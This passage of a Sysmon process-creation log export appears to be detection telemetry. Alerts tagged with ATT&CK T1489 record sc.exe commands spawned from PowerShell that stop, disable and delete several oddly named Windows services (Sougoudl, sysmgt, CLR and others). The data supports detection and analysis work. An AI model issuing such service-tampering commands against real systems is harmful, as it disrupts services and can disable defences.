-NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:58.150",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:27.865 +ProcessGuid: {df9fc3d3-b393-5ecf-0000-00108bfc2000} +ProcessId: 3628 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Sougoudl +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Sougoudl",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:27.867997000Z"",""eventRecordID"":""2635"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:27.865\r\nProcessGuid: {df9fc3d3-b393-5ecf-0000-00108bfc2000}\r\nProcessId: 3628\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control 
Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Sougoudl\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:27.865"",""processGuid"":""{df9fc3d3-b393-5ecf-0000-00108bfc2000}"",""processId"":""3628"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Sougoudl"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:58.136",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:27.846 +ProcessGuid: {df9fc3d3-b393-5ecf-0000-0010bdfb2000} +ProcessId: 7344 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config Sougoudl Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config Sougoudl Start= 
Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:27.849035200Z"",""eventRecordID"":""2634"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:27.846\r\nProcessGuid: {df9fc3d3-b393-5ecf-0000-0010bdfb2000}\r\nProcessId: 7344\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config Sougoudl Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:27.846"",""processGuid"":""{df9fc3d3-b393-5ecf-0000-0010bdfb2000}"",""processId"":""7344"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config Sougoudl Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:58.075",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:27.800 +ProcessGuid: {df9fc3d3-b393-5ecf-0000-0010f6f92000} +ProcessId: 7748 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WmdnPnSN +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WmdnPnSN",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:27.802230900Z"",""eventRecordID"":""2632"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:27.800\r\nProcessGuid: {df9fc3d3-b393-5ecf-0000-0010f6f92000}\r\nProcessId: 7748\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WmdnPnSN\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:50:27.800"",""processGuid"":""{df9fc3d3-b393-5ecf-0000-0010f6f92000}"",""processId"":""7748"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WmdnPnSN"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:58.011",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:27.720 +ProcessGuid: {df9fc3d3-b393-5ecf-0000-00101bf72000} +ProcessId: 168 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop \gm +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop \\gm",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:27.723107900Z"",""eventRecordID"":""2629"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:27.720\r\nProcessGuid: {df9fc3d3-b393-5ecf-0000-00101bf72000}\r\nProcessId: 168\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop \\gm\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:27.720"",""processGuid"":""{df9fc3d3-b393-5ecf-0000-00101bf72000}"",""processId"":""168"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop \\\\gm"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:57.881",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:27.670 +ProcessGuid: {df9fc3d3-b393-5ecf-0000-001079f52000} +ProcessId: 7776 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete sysmgt 
+CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete sysmgt",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:27.674830100Z"",""eventRecordID"":""2627"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:27.670\r\nProcessGuid: {df9fc3d3-b393-5ecf-0000-001079f52000}\r\nProcessId: 7776\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete sysmgt\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:27.670"",""processGuid"":""{df9fc3d3-b393-5ecf-0000-001079f52000}"",""processId"":""7776"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete sysmgt"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:57.855",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:27.651 +ProcessGuid: {df9fc3d3-b393-5ecf-0000-0010aff42000} +ProcessId: 7788 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 
(WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop sysmgt +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop sysmgt",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:27.653788200Z"",""eventRecordID"":""2626"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:27.651\r\nProcessGuid: {df9fc3d3-b393-5ecf-0000-0010aff42000}\r\nProcessId: 7788\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop sysmgt\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John 
Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:27.651"",""processGuid"":""{df9fc3d3-b393-5ecf-0000-0010aff42000}"",""processId"":""7788"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop sysmgt"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:57.807",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:27.527 
+ProcessGuid: {df9fc3d3-b393-5ecf-0000-001068ed2000} +ProcessId: 1996 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop CLR +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 